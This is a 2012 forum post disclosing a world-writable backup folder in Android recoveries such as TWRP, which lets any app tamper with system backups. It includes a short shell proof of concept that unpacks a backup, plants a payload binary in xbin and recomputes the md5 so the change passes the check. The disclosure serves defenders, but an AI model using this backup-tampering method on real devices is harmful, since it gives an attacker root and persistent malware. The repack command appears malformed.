Posted 23 October 2012 - 09:24 AM #1

Well, while I really hate to do this write up right now regarding one o

f my favorite recoveries. I feel as though it is needed to continue the development in security in the Android community.

Exploit: File permissions error ( General filesystem fault) on Android custom recoveries.

Software(s) affected: TWRP 2.*, CWM (possibly. Need more testing) {Only on /data/media devices [that we know of] }

This exploit is very simple but I would also class it as critical as it can compromise all userdata and binaries in the system. I have talked with Teamwin and they will implement a fix when they can. Not sure on the status of CWM as koush didn't respond before the write up.

Exploit information / disclosure:

When we look at the backups in TWRP / CWM, we normally just see our data. Well, unfortunately there is also a read / write permission ready for any user / app to come along and analyze, modify, and even use our backups as a method to exploit and gain system privileges on our device. This can easily be attacked but not quite so easily patched. The only real way myself or the developers of TWRP can think of how to fix it is using encrypted backups. With this in the works as of now the software is still vulnerable and a piece of malware could come along and hijack your backup / propagate itself in a worm like function to your roms.

Now, is this an absolute terrible vulnerability? No. It's completely conditional but still enough to be considered a security flaw. This is why I like SDcards. It has to be written to through API calls (as far as I'm aware). With this exploit, I can just write to /data/media like it's nothing from any app as the system doesn't see the recovery folder as media_rw. It sees it as: drwxrwxrwx root root TWRP

What everyone that knows that linux permissions are and how they work can see 2 things. 1) That's a system owned directory.

2) I have read, write, execute permissions IN that system owned directory.

This can lead to the result of "Hey, I can learn where their backups are and just add a payload to the system and let it be owned by root which can cause some fun things when the user restores the system (replace something as simple as su or chmod) or even replace su to no longer call to Superuser.apk and then have another payload run as root directly.

While this all seems scary, it's not the end of the world. This exploit can be patched once someone pushes the necessary code to TWRP as well as an update gets released for it.

All in all, a simple vulnerability with root folder permissions becomes a very scary exploit that can lead to destroying a system, local privilege escalation, and even to malware propagating.

PoC:

#!/bin/sh

cd /data/media/TWRP/BACKUPS/{Redacted}/Stock/

mkdir extracted; cd extracted

tar xf system.ext4.win; cd ..

dd if=/data/media/payload.bin of=/data/media/TWRP/BACKUPS/{Redacted}/Stock/extracted/xbin/payload; chmod 755 /data/media/TWRP/BACKUPS/{Redacted}/Stock/extracted/xbin/payload

tar -cvwf ./extracted/ system.ext4.win

md5sum system.ext4.win > system.ext4.win.md5

Shout outs:

remicks - He's a jerkface but I owe him quite a bit (and it's his birthday today)

couga - For managing to help me disclose this to the devs while I was in class

Dees_troy - For listening to the disclosure and discussing it with me.

Twitter - @xIndirect XDA Profile - Indirect RootzWiki Profile - Indirect